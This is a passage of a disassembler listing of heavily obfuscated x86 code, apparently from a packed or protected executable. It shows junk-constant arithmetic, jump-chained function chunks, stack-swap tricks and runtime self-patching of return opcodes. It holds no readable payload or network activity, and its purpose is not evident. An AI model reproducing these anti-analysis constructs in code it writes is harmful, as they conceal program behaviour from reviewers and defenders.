loc_44795F: ; CODE XREF: ut7h7i2x:004499D7j
jle loc_452B5E
; START OF FUNCTION CHUNK FOR sub_43E592
loc_447965: ; CODE XREF: sub_43E592:loc_4499AEj
rol eax, 11h
add eax, 24DB2F20h
mov eax, [eax]
mov [eax], ebx
jmp loc_44A3AC
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439C85
loc_447977: ; CODE XREF: sub_439C85:loc_448536j
mov dword ptr [ebp-8], 1
jmp loc_443673
; END OF FUNCTION CHUNK FOR sub_439C85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A2AD
loc_447983: ; CODE XREF: sub_45A2ADj
call sub_442670
; END OF FUNCTION CHUNK FOR sub_45A2AD
; START OF FUNCTION CHUNK FOR sub_449E96
loc_447988: ; CODE XREF: sub_449E96+Dj
jmp loc_45756B
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
loc_44798D: ; CODE XREF: ut7h7i2x:00445960j
jge loc_44CCD9
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_447993: ; CODE XREF: sub_43D021:loc_43ED1Fj
; sub_4406F1+16j
jmp loc_456C7A
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
mov esi, 0A04BFDD7h
add eax, 5BA480D0h
jmp loc_44CCCE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_4479A8: ; CODE XREF: sub_449D3B:loc_4439A6j
cmp eax, 0E94E05B0h
jmp loc_4447FD
; END OF FUNCTION CHUNK FOR sub_449D3B
; =============== S U B R O U T I N E =======================================
sub_4479B3 proc near ; CODE XREF: ut7h7i2x:0044197Bj
; sub_457576+Dp
xchg ebx, [esp+0]
pop ebx
push 1
lea eax, [ebp-806h]
push eax
push esi
sub_4479B3 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4479C1: ; CODE XREF: sub_43FF65+1260Fj
mov esi, ebx
xchg esi, [esp+0]
jmp loc_44BFDC
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4479CB: ; CODE XREF: sub_439BF8-7E0j
jz loc_4448BD
jmp loc_452281
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B1E7
loc_4479D6: ; CODE XREF: sub_44B1E7-25EEj
jnz loc_43D65E
jmp loc_444ED5
; END OF FUNCTION CHUNK FOR sub_44B1E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A218
loc_4479E1: ; CODE XREF: sub_43A218+9209j
sub edx, 0B45085D7h
not edx
cdq
jmp loc_449D11
; END OF FUNCTION CHUNK FOR sub_43A218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_4479EF: ; CODE XREF: sub_445188:loc_445888j
cmp esi, 9A16427Fh
jmp loc_4580F3
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
sbb edx, 7FF1EB1Ch
jmp sub_459C87
; ---------------------------------------------------------------------------
loc_447A05: ; CODE XREF: ut7h7i2x:0045333Fj
test ebx, esi
jmp loc_443B44
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_363. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_447A0D: ; CODE XREF: sub_449700+8F4Ej
jmp loc_441A8D
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_447A12: ; CODE XREF: sub_43FF65:loc_43994Aj
jmp nullsub_169
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
mov eax, 0E211C416h
call sub_45854D
push ebx
push offset loc_43D22C
jmp locret_43D48E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445BB7
loc_447A2C: ; CODE XREF: sub_445BB7+18j
popf
xchg edx, [esp+0]
jmp loc_455E7F
; END OF FUNCTION CHUNK FOR sub_445BB7
; ---------------------------------------------------------------------------
loc_447A35: ; CODE XREF: ut7h7i2x:00459161j
ror esi, 8
pop eax
loc_447A39: ; CODE XREF: ut7h7i2x:loc_43E791j
mov eax, [ebp-4]
loc_447A3C: ; CODE XREF: ut7h7i2x:loc_455350j
cmp byte ptr [eax], 0F1h
jnz loc_44CD58
jmp loc_43AB83
; ---------------------------------------------------------------------------
loc_447A4A: ; DATA XREF: sub_452BE9+3EA9o
xor ecx, 35D7A252h
add eax, ecx
pop ecx
push offset loc_443B16
jmp loc_44A8B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_447A5D: ; CODE XREF: sub_459E54:loc_44CD36j
jnz loc_43A4C7
rol esi, 0Ah
jmp loc_43A4C4
; END OF FUNCTION CHUNK FOR sub_459E54
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_362. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_447A6C: ; CODE XREF: ut7h7i2x:loc_443B05j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_447A6D: ; CODE XREF: sub_450231+667Bj
jmp loc_444B57
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450365
loc_447A72: ; CODE XREF: sub_450365+Ej
jmp sub_4497C1
; END OF FUNCTION CHUNK FOR sub_450365
; ---------------------------------------------------------------------------
loc_447A77: ; CODE XREF: ut7h7i2x:loc_43A8ADj
pop esi
call sub_45A3F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_505. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor edi, ecx
jmp loc_44D77C
; ---------------------------------------------------------------------------
loc_447A85: ; CODE XREF: ut7h7i2x:0045A70Dj
xor esi, 4D126D54h
add esi, 0A2BC6037h
xchg esi, [esp]
jmp sub_43DA21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F256
loc_447A99: ; CODE XREF: sub_44F256:loc_44A6EDj
; ut7h7i2x:loc_459E74j
add ebx, 0CCA9DE91h
rol ebx, 0Bh
xor ebx, 9518F103h
add ebx, 9E3975D3h
xchg ebx, [esp+4+var_4]
jmp loc_43B098
; END OF FUNCTION CHUNK FOR sub_44F256
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_447AB6: ; CODE XREF: sub_4462B0:loc_44D012j
mov edx, ecx
xchg edx, [esp+4+var_4]
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
lea eax, loc_451120
jmp loc_456FC8
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_447AD0: ; CODE XREF: ut7h7i2x:00441604j
jnp loc_44F6D1
; =============== S U B R O U T I N E =======================================
sub_447AD6 proc near ; CODE XREF: ut7h7i2x:00444652p
; FUNCTION CHUNK AT 00444701 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, offset dword_43E3A0
call sub_43F058
lea eax, [ebp-14h]
push eax
jmp loc_444701
sub_447AD6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_447AED: ; CODE XREF: ut7h7i2x:loc_453331j
pop ecx
jmp loc_43ABF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44871F
loc_447AF3: ; CODE XREF: sub_44871F+1EFDj
add edi, ebp
add edi, 0FA6F7A57h
mov [edi], eax
call sub_443A45
; END OF FUNCTION CHUNK FOR sub_44871F
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_447B02: ; CODE XREF: sub_43DD17+1043Cj
jmp loc_44A2EC
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_447B07: ; CODE XREF: sub_446320-106Fj
jmp loc_4490D4
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_447B0C: ; CODE XREF: sub_444273+C7A7j
push edi
mov ecx, 0D7F079BEh
jmp loc_43CCA6
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_447B17: ; CODE XREF: sub_43EDD8+Ej
jz loc_43D030
jmp loc_458750
; END OF FUNCTION CHUNK FOR sub_43EDD8
; ---------------------------------------------------------------------------
loc_447B22: ; CODE XREF: ut7h7i2x:loc_442955j
rol esi, 0Fh
and esi, 0F6362483h
add esi, 32873717h
and esi, 0E42A041Ah
jmp loc_455869
; ---------------------------------------------------------------------------
loc_447B3C: ; CODE XREF: ut7h7i2x:loc_452E2Dj
push eax
push esi
mov esi, edx
xchg esi, [esp]
jmp loc_446B98
; =============== S U B R O U T I N E =======================================
sub_447B48 proc near ; CODE XREF: ut7h7i2x:004519C5j
; ut7h7i2x:loc_454D47p
; FUNCTION CHUNK AT 0044105C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044329B SIZE 0000000C BYTES
xchg ecx, [esp+0]
pop ecx
push 8423966h
pop ebx
xor ebx, 6D385853h
jmp loc_44105C
sub_447B48 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_447B5D: ; CODE XREF: ut7h7i2x:004444DFj
jbe loc_453F19
mov [esi], ebx
loc_447B65: ; CODE XREF: ut7h7i2x:0044E88Bj
sub ebx, 15B30903h
add ebx, 0A77DD8C1h
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_447B71: ; CODE XREF: sub_440CEC:loc_459BC2j
xchg ebx, [esp+14h+var_14]
jmp loc_457842
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
xchg esi, [esp]
mov eax, esi
pop esi
jmp loc_43C396
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_447B84: ; CODE XREF: sub_4431FF:loc_45052Fj
xor edx, ecx
jmp loc_4592FE
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
loc_447B8B: ; CODE XREF: ut7h7i2x:0044580Aj
sub al, 99h
push 75605D1Fh
pop edx
sub edx, 81340DBDh
; START OF FUNCTION CHUNK FOR sub_448321
loc_447B99: ; CODE XREF: sub_448321:loc_4498E2j
jnz loc_456A5F
adc ecx, 6DF11155h
jmp loc_44A530
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_447BAA: ; CODE XREF: ut7h7i2x:004550E0j
cdq
; START OF FUNCTION CHUNK FOR sub_459111
loc_447BAB: ; CODE XREF: sub_459111:loc_4550C8j
xor eax, 37612002h
add eax, ebp
add eax, 47BADC11h
jmp loc_4417F6
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AAF5
loc_447BBE: ; CODE XREF: sub_43AAF5+22j
mov [ebx], eax
; END OF FUNCTION CHUNK FOR sub_43AAF5
; START OF FUNCTION CHUNK FOR sub_45967C
loc_447BC0: ; CODE XREF: sub_45967C-C931j
pop ebx
lea eax, nullsub_24
mov byte ptr [eax], 0C3h
jmp loc_454A43
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
pop edx
jmp loc_44914B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_447BD5: ; CODE XREF: sub_43F1B2+C705j
jz loc_439F92
jmp loc_446399
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_447BE0: ; CODE XREF: sub_4503C3-6E9Ej
; sub_457A66:loc_453F4Aj
push 0D36F9314h
pop eax
add eax, 0EDF5DDFBh
and eax, 0E7F40CDEh
rol eax, 3
jmp loc_452FD7
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
locret_447BFA: ; CODE XREF: ut7h7i2x:00446EBAj
retn
; ---------------------------------------------------------------------------
loc_447BFB: ; CODE XREF: ut7h7i2x:0044140Cj
sub eax, 4C9F0E4Eh
jnb loc_45278B
; START OF FUNCTION CHUNK FOR sub_451971
loc_447C07: ; CODE XREF: sub_451971+Aj
jmp loc_451364
; END OF FUNCTION CHUNK FOR sub_451971
; ---------------------------------------------------------------------------
loc_447C0C: ; CODE XREF: ut7h7i2x:00446AC9j
jmp nullsub_524
; ---------------------------------------------------------------------------
jge loc_454C82
jle loc_4563FB
jmp loc_45278B
; ---------------------------------------------------------------------------
loc_447C22: ; DATA XREF: sub_446215-5A01o
mov eax, [esp]
push ebx
mov ebx, edx
xchg ebx, [esp]
call sub_4445DC
mov eax, 0F38AA262h
call sub_43AA94
jmp loc_44E0DE
; ---------------------------------------------------------------------------
loc_447C3F: ; CODE XREF: ut7h7i2x:loc_4493BAj
; ut7h7i2x:loc_451938j
mov ebp, [edx]
jg loc_45A70A
adc edx, 4C7FCB1Fh
jmp loc_4584AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439280
loc_447C52: ; CODE XREF: sub_439280+Dj
push edi
push 65913339h
pop edi
rol edi, 0Eh
jmp loc_44620B
; END OF FUNCTION CHUNK FOR sub_439280
; ---------------------------------------------------------------------------
loc_447C61: ; CODE XREF: ut7h7i2x:00451856j
jnz loc_43ABFD
jmp loc_453331
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_447C6C: ; CODE XREF: sub_43AA94+C251j
rol ebp, 4
loc_447C6F: ; CODE XREF: sub_43AA94:loc_446B5Dj
push ecx
mov ecx, eax
xchg ecx, [esp+4+var_4]
lea eax, loc_458540
push eax
jmp loc_44B9C3
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545D8
loc_447C81: ; CODE XREF: sub_4545D8:loc_43DCE6j
; ut7h7i2x:00450FCBj
sub ebx, ds:4000F9h
xor ebx, 52533E1Ah
xchg ebx, [esp+4+var_4]
loc_447C90: ; CODE XREF: ut7h7i2x:loc_44E0E3j
push edx
pushf
push offset sub_446CBF
jmp nullsub_533
; END OF FUNCTION CHUNK FOR sub_4545D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_447C9C: ; CODE XREF: sub_452361:loc_43C8C4j
add ecx, 67B1A888h
loc_447CA2: ; CODE XREF: sub_44092D:loc_449AF1j
xchg ecx, [esp+0]
jmp loc_443D4F
; END OF FUNCTION CHUNK FOR sub_452361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_447CAA: ; CODE XREF: sub_44B01F:loc_44ECBBj
xor eax, 0BF1F16C7h
add eax, 533F3AA9h
xchg eax, [esp+4+var_4]
jmp nullsub_113
; END OF FUNCTION CHUNK FOR sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_447CBE proc near ; CODE XREF: ut7h7i2x:0045085Cj
; sub_43DBEC+16377p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439343 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043A4A0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A922 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C2F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D84C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043EE20 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F2C7 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043FD07 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044086F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044195B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004425EF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442D0F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044364D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044477C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F8B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004452D7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044564A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004462A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C23 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004484CC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448D82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449345 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B4F1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CAF7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D4B2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D5EE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D8E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC0D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044EDCA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004501F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450217 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450B39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045411C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455322 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00455DFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456D2D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458477 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004588FC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A542 SIZE 00000005 BYTES
xchg eax, [esp+4+var_4]
pop eax
push ebx
push 4ADC8885h
pop ebx
jmp loc_439343
sub_447CBE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_447CCE: ; CODE XREF: sub_44DEFF+Fj
or eax, 18BD6E06h
and eax, 2F25D8B7h
loc_447CDA: ; CODE XREF: ut7h7i2x:00459155j
xor eax, 0FA5712CBh
call sub_43AA94
jmp loc_44B27A
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_447CEB proc near ; CODE XREF: sub_4549F0-1309j
; FUNCTION CHUNK AT 0043B0C4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446881 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C26 SIZE 00000005 BYTES
push ebx
push 5A305F7h
pop ebx
or ebx, 115099BFh
rol ebx, 10h
add ebx, 6245C791h
jmp loc_446881
sub_447CEB endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_405. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D688
loc_447D07: ; CODE XREF: sub_43D688+Aj
jmp loc_4523FF
; END OF FUNCTION CHUNK FOR sub_43D688
; ---------------------------------------------------------------------------
xchg eax, [esp]
mov edx, eax
pop eax
mov eax, [esp]
push edx
call sub_44261F
push 0CF98DF53h
pop eax
jmp loc_44FF20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_447D26: ; CODE XREF: sub_457A66-E863j
jle loc_45803F
shr ebp, 15h
sbb ebp, esi
test ecx, 0CE865C5Dh
jmp loc_446057
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_447D3C: ; CODE XREF: sub_44F43B+7523j
xor eax, edx
and eax, 0D0B20B61h
sub ecx, eax
jmp loc_441329
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_447D4B: ; CODE XREF: sub_445FA9-C1B1j
xchg edx, ecx
loc_447D4D: ; CODE XREF: sub_445FA9:loc_439DE0j
add ecx, 0F5C47959h
xchg ecx, [esp+0]
jmp sub_45854D
; END OF FUNCTION CHUNK FOR sub_445FA9
; =============== S U B R O U T I N E =======================================
sub_447D5B proc near ; CODE XREF: ut7h7i2x:00447912j
; ut7h7i2x:00458D21p
; FUNCTION CHUNK AT 0045A96E SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
mov edx, 30DFC367h
call sub_44ED9F
jmp loc_45A96E
sub_447D5B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_447D6E: ; CODE XREF: sub_4417AF:loc_4434F8j
jnz loc_44E83B
jmp loc_44039B
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
loc_447D79: ; CODE XREF: ut7h7i2x:loc_459F2Bj
lea eax, loc_43CB3A
mov byte ptr [eax], 0C3h
jmp loc_44059C
; =============== S U B R O U T I N E =======================================
sub_447D87 proc near ; CODE XREF: sub_40A15D+17Fp
; sub_40A15D+2A3p ...
call sub_449C5B
loc_447D8C: ; CODE XREF: sub_446151+8ABBj
jmp nullsub_66
sub_447D87 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_447D92: ; CODE XREF: sub_455E0B:loc_45421Dj
xor esi, 0FDBF7F6Fh
xchg esi, [esp+0Ch+var_C]
push ebx
pushf
push 0EA77BE0Fh
pop ebx
add ebx, 0ADA82F36h
rol ebx, 19h
jmp loc_454AAE
; END OF FUNCTION CHUNK FOR sub_455E0B
; ---------------------------------------------------------------------------
xor ebp, 10F01F6Bh
shl eax, 7
jmp sub_4431A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_447DBF: ; CODE XREF: sub_45410C:loc_44A597j
jnz loc_456683
jmp loc_43D972
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444717
loc_447DCA: ; CODE XREF: sub_444717+6j
cmp ds:byte_43E398, 0
call sub_451039
loc_447DD6: ; CODE XREF: sub_44937E+B9F1j
jmp nullsub_20
; END OF FUNCTION CHUNK FOR sub_444717
; =============== S U B R O U T I N E =======================================
sub_447DDB proc near ; CODE XREF: ut7h7i2x:loc_442053j
; sub_459653:loc_442CDCp ...
; FUNCTION CHUNK AT 0043BD54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FDE0 SIZE 00000007 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-14h]
mov eax, [eax+20h]
add eax, [ebp-4]
jmp loc_43BD54
sub_447DDB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_447DED: ; CODE XREF: ut7h7i2x:00459C82j
jz loc_457652
jmp loc_4468EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_447DF8: ; CODE XREF: sub_444851:loc_444075j
add edx, 1808A50h
mov edx, [edx]
xchg edx, [esp+0]
call sub_441AED
push dword ptr [ebp-4]
jmp loc_453E77
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_447E10: ; CODE XREF: sub_446CA0+4344j
cmp eax, ebx
pop ebx
jnz loc_43FBA5
jmp loc_448A88
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
and edi, 835F8185h
jmp sub_447F0A
; =============== S U B R O U T I N E =======================================
sub_447E29 proc near ; CODE XREF: ut7h7i2x:0044D501j
; sub_456111-7CAp
; FUNCTION CHUNK AT 00444081 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044750B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449020 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004502BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453528 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004594B2 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
lea eax, [ebp-8]
push eax
jmp loc_44750B
sub_447E29 endp
; =============== S U B R O U T I N E =======================================
sub_447E36 proc near ; DATA XREF: sub_45292B+5B8o
mov [ecx], eax
push offset loc_454933
jmp nullsub_155
sub_447E36 endp
; =============== S U B R O U T I N E =======================================
sub_447E42 proc near ; DATA XREF: sub_442096:loc_45616Co
push eax
ror eax, 0Eh
mov ds:dword_43A7BC, eax
retn
sub_447E42 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_447E4D: ; CODE XREF: ut7h7i2x:0044D09Fj
jmp locret_44DDCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2AA
loc_447E52: ; CODE XREF: sub_44E2AA:loc_449642j
; ut7h7i2x:00459BE0j
rol eax, 0Eh
push eax
call sub_454196
jmp loc_44AFEE
; END OF FUNCTION CHUNK FOR sub_44E2AA
; ---------------------------------------------------------------------------
loc_447E60: ; CODE XREF: ut7h7i2x:loc_44C730j
jz loc_43AA6C
jmp loc_43F2F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452802
loc_447E6B: ; CODE XREF: sub_452802:loc_43D6A9j
pop ebx
or ebx, 0A0B4382Ah
xor ebx, 5F184C50h
jnz loc_446937
not edx
jmp loc_44497E
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
xchg ebp, [ebx]
jmp loc_441DE4
; ---------------------------------------------------------------------------
call sub_4551D3
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_447E91: ; CODE XREF: sub_4524FE-11B1Ej
jmp loc_449C13
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_447E96: ; CODE XREF: sub_439BF8+3FC1j
add eax, 294320A0h
xchg eax, [esp+8+var_8]
jmp sub_44937E
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_447EA4: ; CODE XREF: sub_44FDF2+563Dj
jnz loc_449137
jmp loc_444DF5
; END OF FUNCTION CHUNK FOR sub_44FDF2
; ---------------------------------------------------------------------------
loc_447EAF: ; CODE XREF: ut7h7i2x:00443B5Aj
jge loc_45A65F
; =============== S U B R O U T I N E =======================================
sub_447EB5 proc near ; CODE XREF: sub_443BC5+12817p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439DD6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A4E2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043A917 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CB44 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D5C8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043EE32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F030 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442F61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444070 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004441B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444DB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004454AB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00445A4F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446C4B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448132 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004491B5 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004496CF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004498A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A1B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EA1C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044F527 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F602 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004505B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451E1D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452FA0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004542B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D1C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455B19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458110 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458887 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004598A6 SIZE 0000000E BYTES
xchg eax, [esp+8+var_8]
pop eax
cmp al, 0A4h
jmp loc_43A917
sub_447EB5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp ds:off_41D044
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_447EC6: ; CODE XREF: ut7h7i2x:loc_43A453j
; sub_449808-F0AAj ...
jnb loc_4585A7
push offset sub_45168E
jmp nullsub_67
; END OF FUNCTION CHUNK FOR sub_449808
; ---------------------------------------------------------------------------
loc_447ED6: ; CODE XREF: ut7h7i2x:00453BCEj
sub edi, 0B09B1F20h
; =============== S U B R O U T I N E =======================================
